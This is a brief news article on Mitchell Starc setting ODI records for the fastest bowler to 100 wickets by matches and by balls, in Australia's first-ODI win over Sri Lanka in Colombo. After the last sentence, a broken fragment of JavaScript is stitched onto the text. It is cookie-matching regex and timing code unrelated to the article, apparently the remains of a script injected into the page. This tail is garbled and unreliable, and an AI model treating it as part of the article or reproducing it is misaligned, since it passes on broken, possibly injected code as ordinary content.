Micthell Starc's brilliant form continued yesterday as he set a new world record during Australia's win over Sri Lanka in the first ODI in Colombo.

The paceman became the fastest man to 100 one-day international wickets.

Starc took his 100th ODI wicket against Sri Lanka last night, in just his 52nd match, breaking the record set by Pakistan's Saqlain Mushtaq of 53 matches.

The 26-year-old also broke the record for the fastest to 100 wickets in terms of balls bowled.

He reached the milestone in just 2452 deliveries, breaking Shoaib Akhtar's record of 2707 deliveries.

Starc has averaged just 19.52 with the ball during his ODI career to date, second behind only the great Joel Garner, as the best average of any bowler with at least 100 wickets.

After Sri Lanka was sent into to bat, Australia, led by four wickets from James Faulkner and three wickets from Mitchell Starc, restricted the hosts to 8-227 from 50 overs.

Australia then chased down the target with three overs to spare, thanks to half centuries from Aaron Finch and Steve Smith.

Game two of the ODI series is on Wednesday in Colombo. "(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));(U[1]):"",();||void 0===time){/1e3+86400),.('')}
